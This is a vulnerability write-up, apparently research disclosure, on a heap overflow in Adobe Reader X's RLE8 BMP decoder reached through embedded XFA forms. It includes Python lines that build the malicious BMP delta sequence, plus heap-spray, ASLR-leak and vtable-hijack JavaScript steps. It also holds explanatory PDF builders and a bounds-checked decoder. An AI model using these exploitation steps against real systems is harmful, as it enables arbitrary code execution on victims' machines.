Adobe Reader X is a powerful software solution developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). Since version 10, it includes Protected Mode, a sandbox technology similar to the one in Google Chrome, which improves the overall security of the product.
Adobe Reader X fails to validate its input when parsing an embedded RLE-encoded BMP image. A malicious BMP image can trigger a heap overflow, and we show that this leads to arbitrary code execution in the context of the sandboxed process. Quick links: white paper, exploit generator in Python, and PoC.pdf for Reader 10.1.4.
The issue presented here is related to the parsing of a BMP file compressed with RLE8. The bug is triggered when Adobe Reader parses an RLE-encoded BMP file embedded in an interactive PDF form. The DLL responsible for handling embedded XFA interactive forms (and the BMP) is the AcroForm.api plugin, so in order to get to the bug we first need to reach the XFA code.
A PDF file can contain interactive forms in two flavors: AcroForms and XFA forms (see http://blogs.adobe.com/livecycle/2011/09/compatibility-matrix-for-xfa.html). The XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules that allow businesses to build interactive forms. At its simplest, a template-based grammar defines fields in which a user provides data. Among other things, it defines buttons, text fields, choice lists, images, and a scripting API to validate the data and interact with the user. It supports JavaScript, XSLT and FormCalc as scripting languages. A small XFA template containing an image looks like this:
>
> <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/">
>   <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
>     <pageSet>
>       <pageArea name="Page1" id="Page1">
>         <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
>         <medium stock="default" short="612pt" long="792pt"/>
>       </pageArea>
>     </pageSet>
>     <subform w="576pt" h="756pt">
>       <field name="ImageField">
>         <ui>
>           <imageEdit data="embed"/>
>         </ui>
>         <value>
>           <image> AAAAA… AAAAAA</image>
>         </value>
>       </field>
>     </subform>
>   </subform>
> </template>
>
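The same template can be generated programmatically. The following is a minimal Python sketch using the standard library's ElementTree. The helper name `xfa_template` is hypothetical. The sketch assumes that the `<image>` content is the base64 text of the image file, which the `AAAA…` placeholder suggests, and, like the template above, it sets no `contentType` or `transferEncoding` attributes. It builds the same element tree as the listing, without the indentation.

```python
import base64
import xml.etree.ElementTree as ET

# Namespace URI copied from the template above.
XFA_NS = "http://www.xfa.org/schema/xfa-template/3.1/"


def xfa_template(image_bytes: bytes) -> str:
    """Build a one-field XFA template like the one above (hypothetical helper).

    Assumes the <image> content is the base64 text of the image file.
    """
    # Declared literally, as in the source; ElementTree writes it unchanged.
    template = ET.Element("template", {"xmlns:xfa": XFA_NS})
    form = ET.SubElement(template, "subform", name="form1", layout="tb",
                         locale="en_US", restoreState="auto")
    page = ET.SubElement(ET.SubElement(form, "pageSet"), "pageArea",
                         name="Page1", id="Page1")
    ET.SubElement(page, "contentArea", x="0.25in", y="0.25in",
                  w="576pt", h="756pt")
    ET.SubElement(page, "medium", stock="default", short="612pt", long="792pt")
    body = ET.SubElement(form, "subform", w="576pt", h="756pt")
    field = ET.SubElement(body, "field", name="ImageField")
    ET.SubElement(ET.SubElement(field, "ui"), "imageEdit", data="embed")
    image = ET.SubElement(ET.SubElement(field, "value"), "image")
    # The embedded image travels as base64 text (assumption, see above).
    image.text = base64.b64encode(image_bytes).decode("ascii")
    return ET.tostring(template, encoding="unicode")
```

Building the tree rather than concatenating strings guarantees well-formed XML and correct attribute escaping.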
An XFA form can be embedded in a regular PDF stream and rendered by all modern versions of Adobe Reader. The PDF catalog must contain the /NeedsRendering, /Extensions and /AcroForm entries, and /AcroForm must point to the form dictionary, whose /XFA entry references the stream holding the XFA. Something like this:
>
> 3 0 obj
> << /Length 12345 >>
> stream
> XFA…
> endstream
> endobj
> 2 0 obj
> << /XFA 3 0 R >>
> endobj
> 1 0 obj
> << /Type /Catalog
> /NeedsRendering true
> /AcroForm 2 0 R
> /Extensions <<
> /ADBE <<
> /BaseVersion /1.7
> /ExtensionLevel 3
> >>
> >>
> …
> >>
> endobj
>
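The skeleton above leaves out the cross-reference table that a complete file needs. The following Python sketch serializes objects 1 to 3 and records each object's byte offset for the xref section. The helper `build_pdf` is hypothetical. The catalog's elided `…` entries are left out, and the PDF specification also requires a /Pages tree in the catalog, so treat the output as a structural illustration rather than a file guaranteed to open in Reader.

```python
def build_pdf(xfa: bytes) -> bytes:
    """Assemble objects 1-3 from the skeleton above into a PDF with an xref table.

    Hypothetical helper: the catalog's elided "..." entries are omitted.
    """
    objects = [
        # 1 0 obj: the catalog, with the three entries discussed above
        b"<< /Type /Catalog /NeedsRendering true /AcroForm 2 0 R\n"
        b"   /Extensions << /ADBE << /BaseVersion /1.7 /ExtensionLevel 3 >> >> >>",
        # 2 0 obj: the form dictionary pointing at the XFA stream
        b"<< /XFA 3 0 R >>",
        # 3 0 obj: the XFA stream; /Length is the exact byte count of the data
        b"<< /Length %d >>\nstream\n" % len(xfa) + xfa + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))            # byte offset of "N 0 obj"
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n" % (len(objects) + 1)
    out += b"0000000000 65535 f \n"         # entry 0: head of the free list
    for off in offsets:
        out += b"%010d 00000 n \n" % off    # each entry is exactly 20 bytes
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\n" % (len(objects) + 1)
    out += b"startxref\n%d\n%%%%EOF\n" % xref_pos
    return bytes(out)
```

Computing the offsets while writing the objects avoids counting bytes by hand. The same approach works when more objects, such as the page tree, are added.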
Graphically a PDF containing an XFA form has this structure:
At this point we can build a PDF containing an XFA form that holds an image. Now let's look at the BMP bug.
An RLE8-compressed BMP combines two modes: absolute mode and RLE (encoded) mode. Both modes can occur anywhere in a single bitmap. Ref. http://www.fileformat.info/format/bmp/corion-rle8.htm
RLE mode is a simple run-length mechanism: the first byte contains the count, and the second byte contains the pixel to be replicated. If the count byte is 0, the second byte is a special code, such as end of line or delta. In absolute mode, the second byte contains the number of bytes to be copied literally. Each absolute run must be word-aligned, which means you might have to add a padding byte that is not included in the count. After an absolute run, RLE compression continues.
Second byte | Meaning |
---|---|
0 | End of line |
1 | End of bitmap |
2 | Delta. The next two bytes are the horizontal and vertical offsets from the current position to the next pixel. |
3-255 | Switch to absolute mode |
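To make the table concrete, here is a Python sketch of an RLE8 expander that follows these rules. The name `decode_rle8` is hypothetical. Its row order mirrors the C listing below, which stores the first decoded row at row height-1 and moves toward row 0 on end-of-line and delta. Unlike that listing, the sketch validates the cursor on every command, delta included. Python integers cannot wrap around, so no bounds test here can be defeated by overflow.

```python
def decode_rle8(data: bytes, width: int, height: int) -> bytearray:
    """Expand BMP RLE8 data into a width*height pixel buffer (sketch).

    The first decoded row lands at row height-1, as in the C listing below.
    Every command, delta included, is checked against the image bounds.
    """
    pixels = bytearray(width * height)
    x, y = 0, height - 1
    i = 0
    while i + 1 < len(data):
        count, value = data[i], data[i + 1]
        i += 2
        if count:                          # encoded run: `value` repeated `count` times
            if not (0 <= y < height and x + count <= width):
                raise ValueError("run outside the image")
            start = y * width + x
            pixels[start:start + count] = bytes([value]) * count
            x += count
        elif value == 0:                   # end of line
            x, y = 0, y - 1
        elif value == 1:                   # end of bitmap
            break
        elif value == 2:                   # delta: two more bytes, dx and dy
            if i + 1 >= len(data):
                raise ValueError("truncated delta")
            x, y = x + data[i], y - data[i + 1]
            i += 2
            if x > width or y < 0:         # reject moves outside the image
                raise ValueError("delta moves outside the image")
        else:                              # absolute run of `value` literal bytes
            literal = data[i:i + value]
            if len(literal) != value:
                raise ValueError("truncated literal run")
            if not (0 <= y < height and x + value <= width):
                raise ValueError("literal run outside the image")
            start = y * width + x
            pixels[start:start + value] = literal
            x += value
            i += value + (value & 1)       # skip the word-alignment pad byte
    return pixels
```

For example, the stream `03 07  00 00  00 03 01 02 03 00  00 01` fills the first decoded row (row 1 of a 4x2 image) with three 7s. It then ends the line and copies the literal bytes 1, 2, 3 (plus one pad byte) into row 0, and finally ends the bitmap.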
Consider the following C listing. This pseudocode is derived from the function in AcroForm.api that is responsible for expanding an RLE-encoded BMP. The functions feof(), fread() and malloc() are the usual ones. The stream is a file from which the complete BMP header, including the height and the width, has already been read. The main purpose of the function is to expand the RLE-encoded data. First, it allocates enough memory to hold the complete image. Then it reads a two-byte command and uses its first byte to decide between the two modes: RLE or absolute. In RLE mode, it repeats the second byte a number of times. In absolute mode there are more options, implemented as a switch:
char* rle(FILE* stream, unsigned height, unsigned width){
    assert(height < 4096 && width < 4096);
    char * line;
    char aux;
    unsigned count;
    struct {
        unsigned char reps;
        unsigned char value;
    }cmd;
    unsigned char xdelta, ydelta;
    unsigned xpos = 0;
    unsigned ypos = height - 1;
    char * texture = malloc(height*width); //Safe mult!
    assert(texture);
    while ( !feof(stream)) {
        fread(&cmd, 1, 2, stream);
        if ( cmd.reps ) {
            assert ( ypos < height && cmd.reps + xpos <= width );
            for(count = 0; count<cmd.reps; count++) { //RLE Mode, repeat the value
                line = texture+(ypos*width);
                line[xpos++] = cmd.value;
            }
        }
        else { // if rep is zero then value is a command
            switch(cmd.value){
                case 0: //End of line
                    ypos -= 1;
                    xpos = 0;
                    break;
                case 1: //End of bitmap. Done!
                    return texture;
                case 2: //Delta case, move bmp pointer
                    fread(&xdelta, 1, 1, stream); // read one byte
                    fread(&ydelta, 1, 1, stream); // read one byte
                    xpos += xdelta;
                    ypos -= ydelta;
                    break;
                default: // literal case
                    assert ( ypos < height && cmd.value + xpos <= width );
                    for(count = 0;count < cmd.value; count++){
                        fread(&aux, 1, 1, stream);
                        line = texture+(width*ypos);
                        line[xpos++] = aux;
                    }
                    if ( cmd.value & 1 ) // padding
                        fread(&aux, 1, 1, stream);
            }//switch(cmd.value)
        }//if (cmd.reps)
    }//while(!feof(stream))
    return texture;
}
As you have probably noticed, there is no assert in the "delta" case (line 32, the case 2 branch). So we can move the destination position arbitrarily, even outside the limits of the texture buffer. However, there are boundary checks when we actually try to write something to the texture buffer, as on line 39 in the literal case.
Note that this leaves a corner case in which a heap overflow can be triggered. Suppose we repeatedly send delta commands that advance the xpos index, without trying to write anything, until xpos gets really big, for example 0xffffff00. To accomplish this, the BMP should contain 0xffffff00/0xff (that is, 0x1010100) delta commands, each incrementing xpos by 0xff, like this:
> bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) // 0xff)
Then, after one more delta that brings xpos to 0x100000000 - len(payload), we pass a literal command that writes up to 0xff bytes of data directly from the file to the pointed-to address. Because xpos + len(payload) wraps around the 32-bit unsigned representation to 0, the boundary assertion holds and the overflow is possible.
> bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00'
> bmp += '\x00'+chr(len(payload))+payload
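The arithmetic can be checked by emulating the listing's 32-bit unsigned math in Python. This sketch assumes a 32-bit process, where line + xpos also wraps modulo 2^32. The helper names are hypothetical, and payload_len must be between 3 and 255 so that the final command is a literal run rather than a special code. The sketch also shows an overflow-free way to write the same bounds test.

```python
MASK32 = 0xFFFFFFFF  # C `unsigned` on the target wraps modulo 2**32


def listing_check(xpos: int, count: int, width: int) -> bool:
    """The literal-mode test `cmd.value + xpos <= width`, in 32-bit arithmetic."""
    return ((count + xpos) & MASK32) <= width


def safe_check(xpos: int, count: int, width: int) -> bool:
    """An overflow-free form of the same test: never computes xpos + count."""
    return xpos <= width and count <= width - xpos


def xpos_before_literal(payload_len: int) -> int:
    """xpos after the delta commands described above (ydelta is always 0)."""
    n_deltas = (0xFFFFFFFF - 0xFF) // 0xFF        # 0x1010100 deltas of +0xff
    xpos = (n_deltas * 0xFF) & MASK32             # 0xffffff00, no wrap yet
    return (xpos + 0x100 - payload_len) & MASK32  # final aligning delta


def signed_offset(xpos: int) -> int:
    """Where line[xpos] lands relative to `line` when pointers are 32 bits."""
    return xpos - (1 << 32) if xpos & 0x80000000 else xpos
```

With a 0x20-byte payload, xpos ends at 0xffffffe0. The listing's check computes (0xffffffe0 + 0x20) mod 2^32 = 0, which does not exceed the width, so it passes. The 0x20 writes then land just before line, which for a one-row image is the start of the texture. safe_check rejects the same input because it never forms the wrapping sum.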
Summing up, using this bug we can overwrite up to 255 (0xff) bytes immediately before the texture buffer.
The texture is allocated on the heap using the width and height found in the BMP header. So we control the size of the overflowable allocation, and we need to choose it wisely to overwrite something useful. But first, to increase reliability, it is better to prepare the heap with a sequence of allocations. We use the well-known JavaScript method for allocating and freeing heap chunks. The exploitation script would be like this:
Allocate 1000 chunks of 0x12C bytes of controlled data. This very likely enables the LFH for size 0x12C (0x12, i.e. 18, consecutive allocations are enough to enable the LFH for a given size). An object of 0x12C bytes is used after the decoding of all images, and it contains pointers to specific vtables and functions. The goal is to read and write this structure from JavaScript. To achieve this, we first need to leak some pointer to the JavaScript interpreter so that we can bypass ASLR and DEP. To learn the address of some DLLs, we need to be able to read an object structure from JavaScript. To get there, we'll load a broken BMP image that corrupts an LFH chunk header, thus tricking the allocator into believing that the memory of a live JavaScript string is free.
When this BMP, of size {1, 0x12C}, is loaded, its pixel texture (of size 0x12C) will most likely be allocated in one of the previously prepared holes.
> _If you can overflow into a chunk that will be freed, the SegmentOffset in the heap chunk header can be used to point to another valid `_HEAP_ENTRY`. This could lead to controlling data that was previously allocated._ See https://www.lateralsecurity.com/downloads/hawkes_ruxcon-nov-2008.pdf
At this point we have a JavaScript string using memory that the allocator considers free. A new allocation of 0x12C bytes will probably be assigned to the same memory, overlapping the JavaScript string. We want a JavaScript string to share its memory with an object containing vtables, so that we can learn the location of some DLL from the JavaScript interpreter. Because we have chosen the chunk size carefully, this happens automatically: an interesting object gets allocated in the memory actually pointed to by one of the JavaScript strings.
Now let's iterate over all JavaScript strings, looking for the one that has changed:
for (i=0; i < spray.size; i+=1)
    if ( spray.x[i] != null &&
         spray.x[i][0] != "\u5858"){
        …
    }
If found, parse its contents to discover the address of AcroRd32.dll:
acro = (( util.unpackAt(spray.x[i], 14) >> 16) - offset) << 16;
break;
At this point we have pinpointed the exact string index that shares its memory with an imgstruct, and we have leaked the address of AcroRd32.dll to the JavaScript interpreter.
In JavaScript, strings are immutable. To modify one, you need to free the old string and make a new copy with the modifications you want. Usually, if the new string has the same size as the old one, it will be allocated in the same spot. So, to change the object's contents, we free the selected JavaScript string and allocate another one with different content in the same memory.
Calling doc.close() from the JavaScript interpreter triggers the unloading of all loaded XFA images and, with it, the use of the overwritten vtable.
The replaced pointers in the object are used once more in the destructors, and control flow is captured. One last step involves heap-spraying a bed of pointers at a known address. A more specific technique (provided upon request), in which other heap addresses are leaked to the interpreter, does not need this step.